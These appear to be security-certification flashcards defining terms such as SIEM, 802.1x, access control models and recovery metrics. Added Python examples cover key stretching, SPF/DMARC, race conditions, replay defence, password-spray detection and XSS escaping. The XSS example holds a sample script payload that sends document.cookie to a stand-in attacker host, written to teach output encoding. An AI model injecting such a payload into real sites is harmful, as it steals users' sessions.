SIEM
Security Information and Event Management. collects and correlates log data from across an organization's IT environment so security threats can be detected and managed in near real time
802.1x
provides a secure way to authenticate users and devices before granting them access to a network (port-based network access control). uses a centralized authentication server (commonly RADIUS), so all users can log in with their corporate credentials instead of a shared network password.
EAP
Extensible Authentication Protocol. an authentication framework (not a single method) that carries authentication methods such as certificates or passwords; commonly associated with network access control and used in Wi-Fi via the 802.1x standard
on-path
when an attacker places themselves between two parties to eavesdrop, steal data, or alter the conversation (also called man-in-the-middle). Can redirect traffic through ARP poisoning or DNS poisoning. On encrypted (TLS) connections the attacker has to present a certificate the client will trust, so unexpected certificate warnings are a sign of an on-path attack, and proper certificate validation is the main defense.
DoS
Denial of Service. prevents legitimate communication with a server or service, typically seen by the client as a timeout error
Key Escrow
describes the storage and management of decryption keys by a third-party
segmentation
on a mobile device, describes the separation of personal user data from company data so the company can manage or wipe its data without touching the user's. In a network, describes dividing the network into isolated zones so a compromise in one zone cannot spread freely to another.
cold-site recovery
the most basic recovery site. consists of power, networking capability, and cooling. doesn't have hardware elements such as servers and storage, so it takes the longest to bring online
warm-site recovery
all the elements of a cold site plus some hardware already in place, but doesn't have current data available; data must be restored before use
hot-site recovery
a fully functional backup site that has important data mirrored onto it
PSK
(Pre-Shared Key) is a wireless configuration option that allows everyone on the network to use the same access key or password when connecting to the wireless network.
WPA3
(Wi-Fi Protected Access 3) is the current wireless security standard. All data sent over a WPA3-protected wireless network is encrypted, and its SAE handshake protects against offline dictionary attacks on the pre-shared key.
Posture assessment
evaluates the configuration of a system to ensure all configurations and applications are up to date and secure as possible.
discretionary
an authorization method where the owner of the data determines the scope and type of access. If a user creates a spreadsheet, the user can then assign users and groups to have a particular level of access to that spreadsheet.
mandatory
uses a series of security levels (i.e., public, private, secret) and assigns those levels to each object in the operating system. Users are assigned a security level, and they would only have access to objects that meet or are below that assigned security level.
rule-based
determines access based on a series of system- enforced rules. An access rule might require a particular browser be used to complete a web page form, or access to a file or system is only allowed during certain times of the day.
role-based
assigns a user’s permissions based on their role in the organization. For example, a manager would have a different set of rights and permissions than a team lead.
deauthentication
attacks are commonly associated with wireless networks, and they usually cause disconnects and lack of connectivity
Buffer overflow
an application attack in which more data is written to a memory buffer than it can hold, overwriting adjacent memory. Can cause applications to crash or behave unexpectedly, and can be manipulated to execute attacker-supplied code on the remote device.
Dns poisoning
can modify a DNS server to modify the IP address provided during the name resolution process. If an attacker modifies the DNS information, they can direct client computers to any destination IP address.
SQL injection
takes advantage of poor input validation: user input is concatenated into a database query so the attacker's input is interpreted as SQL, letting the attacker bypass the application logic and query the database directly.
DNS filtering
uses a database of known malicious websites to resolve an incorrect or null IP address. If a user attempts to visit a known malicious site, the DNS resolution will fail and the user will not be able to visit the website.
honeynet
non-production network created to attract attackers.
SCADA
Supervisory Control and Data Acquisition
VLAN
Virtual Local Area Network. segments a single physical network into multiple separate broadcast domains, grouping devices (computers, servers, printers) into virtual networks regardless of their physical location; traffic between VLANs must pass through a router or firewall, which is what provides the security benefit.
Zero-day
attackers search for unknown vulnerabilities. They create exploits against these vulnerabilities. The vendor has no idea the vulnerability exists – They don’t have a fix for an unknown problem
NGFW
Next-Generation Firewall
key stretching
runs a password or key through a hash function many times (for example PBKDF2, bcrypt or scrypt) before using or storing the result, so that each brute-force guess costs the attacker the same amount of work.
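An added example (not part of the original flashcards) using PBKDF2-HMAC-SHA256 from the Python standard library. The iteration count, the salt size and the sample password are choices made for the demo; the point is that the stored value is derived by repeating the HMAC `iterations` times, so an attacker must pay that same cost for every guess, and a per-user random salt stops precomputed tables from being reused.

```python
import hashlib
import hmac
import os


def derive_key(password: bytes, salt: bytes, iterations: int) -> bytes:
    """Key stretching: PBKDF2 applies HMAC-SHA256 `iterations` times to the password."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=32)


def hash_for_storage(password: bytes, iterations: int = 600_000):
    """Return what a credential store would keep: iteration count, salt and derived key."""
    salt = os.urandom(16)                      # fresh random salt per password
    return iterations, salt, derive_key(password, salt, iterations)


def verify(password: bytes, iterations: int, salt: bytes, stored: bytes) -> bool:
    """Recompute the stretched key and compare in constant time."""
    candidate = derive_key(password, salt, iterations)
    return hmac.compare_digest(candidate, stored)


def attacker_cost_ratio(iterations: int) -> int:
    """Each guess against a stretched hash costs roughly `iterations` HMAC calls
    instead of one plain hash, so the brute-force rate drops by this factor."""
    return iterations


if __name__ == "__main__":
    iters, salt, key = hash_for_storage(b"correct horse battery staple")
    print(verify(b"correct horse battery staple", iters, salt, key))  # True
    print(verify(b"wrong guess", iters, salt, key))                    # False
    print("brute force slowed by ~%dx" % attacker_cost_ratio(iters))
```

Note that the iteration count is stored alongside the salt and key so it can be raised later as hardware gets faster; the stored value must then be re-derived the next time the user logs in.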
SCAP
Security Content Automation Protocol
passive reconnaissance
gathering information about a target (person, organization, network) from public sources without directly interacting with the target's systems, which makes it stealthy and very hard to detect; examples are search engines, social media, DNS and WHOIS records, or other public records
DMARC
(Domain-based Message Authentication, Reporting, and Conformance) is an email authentication protocol built on SPF and DKIM. A DNS TXT record published by the domain owner tells receiving mail servers what to do with messages that fail SPF/DKIM alignment (p=none, quarantine, or reject) and where to send aggregate reports.
SPF
Sender Policy Framework. an email authentication protocol that helps prevent spoofing and phishing by letting domain owners publish, in a DNS TXT record, which mail servers (IP addresses) are authorized to send email for their domain
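An added example (not from the original cards) that covers both the SPF and the DMARC entries above: a small evaluator for the two DNS TXT record formats. The records, IP addresses and domain are constructed for the demo. It handles the `ip4`, `ip6` and `all` SPF mechanisms with their `+ - ~ ?` qualifiers; mechanisms that need live DNS lookups (`include`, `mx`, `a`) are deliberately skipped and treated as no match, which is an assumption made to keep the example offline.

```python
import ipaddress

# Constructed sample records, as they would be returned from DNS TXT lookups.
SPF_RECORD = "v=spf1 ip4:192.0.2.0/24 ip6:2001:db8::/32 -all"
DMARC_RECORD = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com"

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(record: str):
    """Split an SPF record into (qualifier, mechanism, value) tuples."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    parsed = []
    for term in terms[1:]:
        qualifier = "+"                     # default qualifier is '+' (pass)
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, value = term.partition(":")
        parsed.append((qualifier, name.lower(), value))
    return parsed


def spf_check(record: str, sender_ip: str) -> str:
    """Return pass/fail/softfail/neutral for the connecting server's IP."""
    ip = ipaddress.ip_address(sender_ip)
    for qualifier, name, value in parse_spf(record):
        if name in ("ip4", "ip6"):
            # A mismatched IP version simply does not match the network.
            matched = ip in ipaddress.ip_network(value, strict=False)
        elif name == "all":
            matched = True
        else:
            matched = False                 # include/mx/a need DNS; skipped here (assumption)
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"                        # no mechanism matched and no 'all'


def parse_dmarc(record: str) -> dict:
    """Parse 'tag=value; tag=value' into a dict and check the version tag."""
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags


def dmarc_disposition(record: str, spf_result: str, spf_aligned: bool,
                      dkim_pass: bool, dkim_aligned: bool) -> str:
    """DMARC passes if either SPF or DKIM passes *and* is aligned with the From domain;
    otherwise the domain owner's policy (p=) decides what the receiver does."""
    tags = parse_dmarc(record)
    if (spf_result == "pass" and spf_aligned) or (dkim_pass and dkim_aligned):
        return "deliver"
    return {"none": "deliver (report only)",
            "quarantine": "quarantine",
            "reject": "reject"}[tags.get("p", "none")]


if __name__ == "__main__":
    print(spf_check(SPF_RECORD, "192.0.2.10"))        # pass
    print(spf_check(SPF_RECORD, "198.51.100.5"))      # fail (hits -all)
    print(dmarc_disposition(DMARC_RECORD, "fail", False, False, False))  # reject
```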
CA
Certificate Authority - An organization that issues and verifies digital certificates to confirm the identity of websites, users, or devices.
MTBF
Mean Time Between Failures is a reliability metric measuring the average operating time of a repairable system between one failure and the next
RTO
Recovery Time Objective is the maximum acceptable time an organization can tolerate a system or service being down after a cyberattack or disaster before significant business harm occurs
MTTR
Mean Time To Repair (also read as Mean Time To Recover/Restore). measures the average time it takes to fix a failed system or resolve an incident and return to normal operation
RPO
Recovery Point Objective. the maximum acceptable amount of data loss, measured in time (e.g., 1 hour, 1 day), that an organization can tolerate after a disruptive event like a cyberattack or system failure, dictating how frequently data backups must occur to meet business continuity needs
MOA
Memorandum of Agreement, a formal document between two or more organizations defining a cooperative relationship
SLA
Service Level Agreement. binding contract detailing specific service performance metrics, availability, and remedies for failure
SOW
Statement of Work. details the specific projects, deliverables, timelines, and costs for a piece of work, usually under the terms of a broader contract between the parties
Race Condition
a programming flaw that occurs when two processes or threads access the same shared data at the same time and the outcome depends on which one finishes first. A common form is time-of-check to time-of-use (TOCTOU): one part of the application checks a condition, another part changes the data before the first part acts on its (now stale) check.
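An added example (not from the original cards) of a TOCTOU race on a bank balance, with the fix beside it. The account, amounts and thread count are constructed for the demo. A barrier forces both threads past the balance check before either one writes, so the bad interleaving happens every run rather than only occasionally; in the fixed version the check and the update are done under one lock so they become a single atomic step.

```python
import threading


class Account:
    def __init__(self, balance: int):
        self.balance = balance
        self.lock = threading.Lock()


def withdraw_racy(acct: Account, amount: int, barrier: threading.Barrier) -> bool:
    # Time of check: read the balance and decide.
    if acct.balance >= amount:
        barrier.wait()            # demo only: make every thread pass the check first
        # Time of use: update based on a check that is now stale.
        acct.balance -= amount
        return True
    return False


def withdraw_locked(acct: Account, amount: int, barrier: threading.Barrier) -> bool:
    # Check and update happen inside one critical section, so no other
    # thread can change the balance between the two steps.
    with acct.lock:
        if acct.balance >= amount:
            acct.balance -= amount
            return True
        return False


def run_withdrawals(withdraw, balance: int, amount: int, n_threads: int = 2):
    """Run `n_threads` concurrent withdrawals; return (final balance, sorted results)."""
    acct = Account(balance)
    barrier = threading.Barrier(n_threads, timeout=5)   # timeout avoids a hang if misused
    results = []
    threads = [
        threading.Thread(target=lambda: results.append(withdraw(acct, amount, barrier)))
        for _ in range(n_threads)
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return acct.balance, sorted(results)


if __name__ == "__main__":
    print(run_withdrawals(withdraw_racy, balance=100, amount=80))    # (-60, [True, True])
    print(run_withdrawals(withdraw_locked, balance=100, amount=80))  # (20, [False, True])
```

With a starting balance of 100 and two concurrent withdrawals of 80, the racy version lets both succeed and leaves the balance at -60; the locked version lets exactly one through.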
Record Encryption
secures individual data entries (records) within a database or file, scrambling them into unreadable code (ciphertext) using unique keys
Journaling
logging system or application activities (like file changes, database updates, or emails) in a sequential record (a "journal") to ensure data integrity, enable recovery after crashes, and create audit trails for security analysis
MDM
Mobile Device Management, a solution that lets organizations remotely control, secure, and manage mobile devices
COPE
Corporate-Owned, Personally Enabled, a mobile device strategy where the company provides devices (phones, laptops) but allows employees limited personal use, balancing corporate security control
Configuration Enforcement
fixes the problems after a posture assessment
business continuity
defines the procedures used to keep the business running when the primary business systems are unavailable.
development lifecycle
defines the specific policies associated with the design, development, testing, deployment, and maintenance of the application development process.
acceptable use policy
formally defines the proper use of company assets and technology devices.
risk register
identifies and documents the risks associated with each step of a project plan
risk transfer
Some organizations will transfer their risk to a third-party. For example, many organizations will purchase cybersecurity insurance to minimize the financial impact of a cybersecurity event.
backout plan
provides information on reverting to the previous configuration if an unrecoverable error is found during the change.
replay attack
captures legitimate information (such as an authentication exchange or a signed request) and later re-sends that same information as the method of attack; defended against with timestamps, nonces or session-specific tokens that make each message valid only once
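An added example (not from the original cards) of the exchange described above: a client signs a request with a shared HMAC key, and the server verifies it. The key, message format and time window are constructed for the demo. A signature alone does not stop replay, because the captured request is still correctly signed; the server also needs a per-message nonce it remembers and a timestamp window that bounds how long it must remember them.

```python
import hashlib
import hmac
import json
import os
import time

SHARED_KEY = b"constructed-demo-key"     # assumption: pre-shared by client and server


def sign_request(key: bytes, payload: dict, nonce: str = None, now: float = None):
    """Client side: bundle payload, a one-time nonce and a timestamp, then HMAC it."""
    msg = {
        "payload": payload,
        "nonce": nonce if nonce is not None else os.urandom(8).hex(),
        "ts": int(now if now is not None else time.time()),
    }
    body = json.dumps(msg, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return body, tag


class Server:
    def __init__(self, key: bytes, max_skew: int = 30):
        self.key = key
        self.max_skew = max_skew          # seconds of clock skew tolerated
        self.seen_nonces = set()          # only needs to hold nonces within the window

    def verify_signature_only(self, body: bytes, tag: str) -> str:
        """The naive check: a replayed capture passes, because it is still validly signed."""
        expected = hmac.new(self.key, body, hashlib.sha256).hexdigest()
        return "ok" if hmac.compare_digest(expected, tag) else "bad signature"

    def verify(self, body: bytes, tag: str, now: float = None) -> str:
        """Signature, freshness window and nonce uniqueness, in that order."""
        if self.verify_signature_only(body, tag) != "ok":
            return "bad signature"
        msg = json.loads(body)
        now = now if now is not None else time.time()
        if abs(now - msg["ts"]) > self.max_skew:
            return "stale"                # outside the window: reject without tracking nonce
        if msg["nonce"] in self.seen_nonces:
            return "replay"               # captured and re-sent inside the window
        self.seen_nonces.add(msg["nonce"])
        return "ok"


if __name__ == "__main__":
    server = Server(SHARED_KEY)
    body, tag = sign_request(SHARED_KEY, {"action": "transfer", "amount": 500})
    print(server.verify(body, tag))       # ok      (first delivery)
    print(server.verify(body, tag))       # replay  (attacker re-sends the capture)
    print(server.verify_signature_only(body, tag))   # ok - signature alone is not enough
```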
privilege escalation attack
allows a user to exceed their normal rights and permissions.
jailbreaking
removes the manufacturer's restrictions on a mobile device, often by replacing or modifying the device firmware, to gain access to features and apps not normally available in the operating system; the device loses the platform's built-in security controls in the process.
capacity planning
used to determine how many resources would be required for a particular task
load balancing
used to distribute transactions across multiple systems.
spraying attack
tries a short list of the most common passwords against many different accounts, with only one or two attempts per account, so it stays under the lockout threshold and avoids alerts. (Using passwords stolen from other sites against the same users is credential stuffing, a related but different attack.)
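An added example (not from the original cards) of the kind of detection a SIEM would run against aggregated authentication logs to catch a spray: one source address producing failures for many distinct usernames within a window while staying under the per-account lockout count. The log format, timestamps, IPs and usernames are constructed for the demo; the thresholds are assumptions a real deployment would tune.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (not from any real system).
SAMPLE_LOG = """\
2024-05-01T10:00:01 src=203.0.113.7 user=alice result=FAIL
2024-05-01T10:00:09 src=203.0.113.7 user=bob result=FAIL
2024-05-01T10:00:17 src=203.0.113.7 user=carol result=FAIL
2024-05-01T10:00:25 src=203.0.113.7 user=dave result=FAIL
2024-05-01T10:00:33 src=203.0.113.7 user=erin result=FAIL
2024-05-01T10:00:41 src=203.0.113.7 user=frank result=SUCCESS
2024-05-01T10:02:00 src=198.51.100.20 user=grace result=FAIL
2024-05-01T10:02:05 src=198.51.100.20 user=grace result=SUCCESS
2024-05-01T10:05:00 src=192.0.2.99 user=heidi result=FAIL
2024-05-01T10:05:01 src=192.0.2.99 user=heidi result=FAIL
2024-05-01T10:05:02 src=192.0.2.99 user=heidi result=FAIL
2024-05-01T10:05:03 src=192.0.2.99 user=heidi result=FAIL
2024-05-01T10:05:04 src=192.0.2.99 user=heidi result=FAIL
2024-05-01T10:05:05 src=192.0.2.99 user=heidi result=FAIL
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)


def parse_log(text: str):
    """Turn log lines into (timestamp, src, user, result) tuples; skip unparseable lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["result"]))
    return events


def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Flag a source IP that fails against >= min_users distinct accounts inside `window`
    while never exceeding max_per_user attempts on any one account (lockout evasion).
    Returns {src: number_of_distinct_users}."""
    fails_by_src = defaultdict(list)
    for ts, src, user, result in events:
        if result == "FAIL":
            fails_by_src[src].append((ts, user))
    alerts = {}
    for src, fails in fails_by_src.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            in_window = Counter(u for ts, u in fails[i:] if ts - start <= window)
            if len(in_window) >= min_users and max(in_window.values()) <= max_per_user:
                alerts[src] = len(in_window)
                break
    return alerts


def successes_from(events, sources):
    """Accounts that logged in successfully from a flagged source: likely compromised."""
    return sorted({user for _, src, user, result in events
                   if src in sources and result == "SUCCESS"})


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    alerts = detect_spray(events)
    print(alerts)                                   # {'203.0.113.7': 5}
    print(successes_from(events, alerts))           # ['frank']
```

The brute-force source (192.0.2.99, six failures on one account) is deliberately not flagged by this rule: it exceeds the per-account limit and is the pattern account lockout already catches. The spray source is the one that lockout does not see, which is why a cross-account, per-source view from a SIEM is needed.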
UPS
Uninterruptible Power Supply
secure enclave
a protected area for secret information, and is often implemented as a hardware processor in a device.
blockchain
can be used to track or verify components, digital media, votes, and other physical or digital objects.
audit committee
oversees the risk management activities for an organization.
right-to-audit clause
often included in a third-party contract to define the terms and conditions around periodic audits. This is often part of a larger product or services contract.
enumeration
in asset management, the detailed listing of all components in a particular device; in reconnaissance, the process of actively listing a target's hosts, users, shares, and services.
sanitization
deletes data from storage media and allows the storage device to be used in the future.
certification
If a third-party is providing destruction services, they often will certify the work and document which device serial numbers were destroyed as part of their service.
cross-site scripting
allows an attacker to inject a script into a trusted website so that it runs in other users' browsers with that site's privileges (session cookies, same-origin access), because the site echoes untrusted input into its pages without escaping it.
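An added example (not from the original cards) showing the injection point and its fix in a server-side renderer. The comment payload, the page fragment and the URL values are constructed for the demo. The vulnerable renderer drops user text straight into HTML; the safe one escapes it for the HTML body, and a separate check covers the link context, where escaping alone does not stop a `javascript:` URL.

```python
from html import escape
from urllib.parse import urlsplit

# Constructed attacker input: steals the session cookie if it runs.
XSS_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_comment_vulnerable(comment: str) -> str:
    # Reflected/stored XSS: untrusted text becomes part of the page's markup.
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment: str) -> str:
    # Output encoding for the HTML body context: < > & " ' become entities,
    # so the browser displays the payload as text instead of executing it.
    return '<p class="comment">' + escape(comment, quote=True) + "</p>"


def is_safe_link(url: str) -> bool:
    """For an href attribute, escaping is not enough: 'javascript:alert(1)' contains
    nothing to escape but still runs script. Allow only http(s) schemes."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return scheme in ("http", "https")


def render_link_safe(url: str, text: str) -> str:
    href = url if is_safe_link(url) else "#"
    return '<a href="' + escape(href, quote=True) + '">' + escape(text, quote=True) + "</a>"


def contains_script_tag(html: str) -> bool:
    """Crude check used here only to show which rendering left the tag intact."""
    return "<script" in html.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(XSS_PAYLOAD))   # script tag survives: executes
    print(render_comment_safe(XSS_PAYLOAD))         # &lt;script&gt;...: displayed as text
    print(render_link_safe("javascript:alert(document.cookie)", "click"))  # href="#"
```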
host-based firewall
a firewall that runs on an individual device (like a laptop, server, or workstation) rather than on the network.
air-gapped network
a network that is physically isolated from all other networks, including the internet.
RTOS
(Real-Time Operating System) is an OS designed to respond to events within guaranteed time limits, used in industrial equipment, automobiles, medical devices, and other time-sensitive applications
CRL
(Certificate Revocation List) is used to determine if a certificate has been administratively revoked.
Data custodian
manages access rights and sets security controls to the data.
Data processor
manages the operational use of the data, but not the rights and permissions to the information.
TPM
(Trusted Platform Module) is a chip on an individual device that provides cryptographic functions and securely stores that device's encryption keys (for example, disk encryption keys). Because the keys are tied to one device, it is not the usual choice for storing keys that many servers share, such as a web farm's private keys; that is an HSM's job.
HSM
(Hardware Security Module) is a high-end cryptographic hardware appliance that can securely store keys and certificates for all devices.
SLE
(Single Loss Expectancy) describes the financial impact of a single event.
UEFI
(Unified Extensible Firmware Interface) is the modern replacement for the old BIOS firmware that starts your computer before the operating system loads.
ALE
(Annual Loss Expectancy) is the expected financial loss from a given risk over an entire 12-month period; ALE = SLE x ARO.
ARO
(Annualized Rate of Occurrence) is the number of times an event will occur in a 12-month period.
Logic Bomb
is malware that installs and operates silently until a certain event occurs. Once it has been triggered, the results usually involve loss of data or a disabled operating system.
DLP
(Data Loss Prevention) technologies can identify and block the transmission of sensitive data across the network.
IPS
(Intrusion Prevention System) sits inline on the network and can block traffic; its signatures match known attack patterns, so it is useful for stopping exploits of known vulnerabilities but not for unknown (zero-day) ones
RADIUS
(Remote Authentication Dial-In User Service) is an authentication protocol commonly used to validate user credentials.
IPsec
(Internet Protocol Security) is a protocol suite for authenticating and encrypting network communication.
CSR
Certificate Signing Request. A file generated by a server or device that contains its public key and identifying information, sent to a CA to request a certificate.
OCSP
Online Certificate Status Protocol. A real-time method for checking whether a certificate is valid or revoked without downloading the entire CRL.
OSINT
Any intelligence gathered from publicly available sources (can be used for cybersecurity, marketing, investigations, etc.).
Log aggregation
a method of centralizing evidence and log files for reporting and future analysis.
SDN
(Software Defined Networking) separates the planes of operation so that infrastructure devices would have a defined control plane and data plane. This allows for more automation and dynamic changes to the infrastructure.
Wireless Deauthentication
would cause users on a wireless network to constantly disconnect.
Partially Known Environment
when the attacker knows some information about the victim, but not all information is available.
Benchmarks
a set of best practices to apply to an application, operating system, or any other service.
DKIM
(Domain Keys Identified Mail) record is a DNS (Domain Name System) entry that includes the public key associated with an email server's digital signatures.
Jump Server
a highly secured device commonly used to access secure areas of another network.
Tokenization
replaces sensitive data with a non-sensitive placeholder.
AAA
(Authentication, Authorization, and Accounting) is a common method of centralizing authentication. Instead of having separate local accounts on different devices, users can authenticate with account information maintained in a centralized database.
Insecure Protocols
will transmit information "in the clear," or without any type of encryption or protection.
Packet Capture
the act of collecting and analyzing network packets to understand or troubleshoot network activity.
Wireshark
captures packets in real time and lets you inspect every detail—IPs, ports, protocols, payloads, etc. Helps with troubleshooting, malware analysis, detecting attacks, and learning how protocols work.
Statement of Work
used during a professional services engagement to detail a list of specific tasks to complete.